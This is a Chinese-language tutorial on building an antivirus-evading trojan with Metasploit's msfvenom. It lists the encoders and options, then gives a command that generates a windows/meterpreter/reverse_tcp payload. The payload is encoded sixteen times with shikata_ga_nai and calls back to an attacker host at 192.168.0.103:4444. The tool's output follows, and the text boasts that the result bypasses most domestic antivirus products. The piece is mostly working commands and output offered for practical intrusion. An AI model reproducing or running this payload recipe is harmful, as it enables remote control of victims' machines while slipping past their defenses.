Msfvenom编码免杀技术实现免杀实战

Msfvenom编码免杀技术免杀实战

免杀技术在网络渗透的实战中十分实用，本文将介绍使用msfvenom自带编码免杀工具进行编码免杀，从而实现绕过杀毒软件获得shell的具体方法。
按照文中所讲述的方法制作的木马载荷可以绕开国内所使用的大多数杀毒软件，包括但不限于火绒，腾讯，百度，金山，virustotal沙箱查杀率12，简单但实用

首先查看 msfveonom中可用的免杀编码器。

msf6 > msfvenom --list encoders

运行结果：

Framework Encoders [--encoder <value>]
======================================

    Name                     Rank       Description
    ----                     ----       -----------
    cmd/brace                low        Bash Brace Expansion Command Encoder
    cmd/echo                 good       Echo Command Encoder
    cmd/generic_sh           manual     Generic Shell Variable Substitution Co
                                        mmand Encoder
    cmd/ifs                  low        Bourne ${IFS} Substitution Command Enc
                                        oder
    cmd/perl                 normal     Perl Command Encoder
    cmd/powershell_base64    excellent  Powershell Base64 Command Encoder
    cmd/printf_php_mq        manual     printf(1) via PHP magic_quotes Utility
                                         Command Encoder
    generic/eicar            manual     The EICAR Encoder
    generic/none             normal     The "none" Encoder
    mipsbe/byte_xori         normal     Byte XORi Encoder
    mipsbe/longxor           normal     XOR Encoder
    mipsle/byte_xori         normal     Byte XORi Encoder
    mipsle/longxor           normal     XOR Encoder
    php/base64               great      PHP Base64 Encoder
    ppc/longxor              normal     PPC LongXOR Encoder
    ppc/longxor_tag          normal     PPC LongXOR Encoder
    ruby/base64              great      Ruby Base64 Encoder
    sparc/longxor_tag        normal     SPARC DWORD XOR Encoder
    x64/xor                  normal     XOR Encoder
    x64/xor_context          normal     Hostname-based Context Keyed Payload E
                                        ncoder
    x64/xor_dynamic          normal     Dynamic key XOR Encoder
    x64/zutto_dekiru         manual     Zutto Dekiru
    x86/add_sub              manual     Add/Sub Encoder
    x86/alpha_mixed          low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper          low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_underscore_to  manual     Avoid underscore/tolower
    lower
    x86/avoid_utf8_tolower   manual     Avoid UTF8/tolower
    x86/bloxor               manual     BloXor - A Metamorphic Block Based XOR
                                         Encoder
    x86/bmp_polyglot         manual     BMP Polyglot
    x86/call4_dword_xor      normal     Call+4 Dword XOR Encoder
    x86/context_cpuid        manual     CPUID-based Context Keyed Payload Enco
                                        der
    x86/context_stat         manual     stat(2)-based Context Keyed Payload En
                                        coder
    x86/context_time         manual     time(2)-based Context Keyed Payload En
                                        coder
    x86/countdown            normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov          normal     Variable-length Fnstenv/mov Dword XOR
                                        Encoder
    x86/jmp_call_additive    normal     Jump/Call XOR Additive Feedback Encode
                                        r
    x86/nonalpha             low        Non-Alpha Encoder
    x86/nonupper             low        Non-Upper Encoder
    x86/opt_sub              manual     Sub Encoder (optimised)
    x86/service              manual     Register Service
    x86/shikata_ga_nai       excellent  Polymorphic XOR Additive Feedback Enco
                                        der
    x86/single_static_bit    manual     Single Static Bit
    x86/unicode_mixed        manual     Alpha2 Alphanumeric Unicode Mixedcase
                                        Encoder
    x86/unicode_upper        manual     Alpha2 Alphanumeric Unicode Uppercase
                                        Encoder
    x86/xor_dynamic          normal     Dynamic key XOR Encoder

列表展示了所有可用的编码器，此处选用x86/shikata_ga_nai举例
以下是msfvenom的可用参数：

Options:
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
        --service-name    <value>    The service name to use when generating a service binary
        --sec-name        <value>    The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
        --smallest                   Generate the smallest possible payload using all available encoders
        --encrypt         <value>    The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
        --encrypt-key     <value>    A key to be used for --encrypt
        --encrypt-iv      <value>    An initialization vector for --encrypt
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
    -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
        --pad-nops                   Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
    -s, --space           <length>   The maximum size of the resulting payload
        --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>    The number of times to encode the payload
    -c, --add-code        <path>     Specify an additional win32 shellcode file to include
    -x, --template        <path>     Specify a custom executable file to use as a template
    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                       Show this message

运行如下命令：

msf6 > msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 16 LHOST=192.168.0.103 LPORT=4444 -f raw X > /Users/shikapy.py

运行结果：

Found 1 compatible encoders
Attempting to encode payload with 16 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai succeeded with size 651 (iteration=10)
x86/shikata_ga_nai succeeded with size 678 (iteration=11)
x86/shikata_ga_nai succeeded with size 705 (iteration=12)
x86/shikata_ga_nai succeeded with size 732 (iteration=13)
x86/shikata_ga_nai succeeded with size 759 (iteration=14)
x86/shikata_ga_nai succeeded with size 786 (iteration=15)
x86/shikata_ga_nai chosen with final size 786
Payload size: 786 bytes

此时已经生成了位于/Users目录下的shikapy.py的木马载荷文件

亦可使用模版文件或使用py2exe工具转换成exe提高免杀效果，本文不再赘述
附：VT查杀图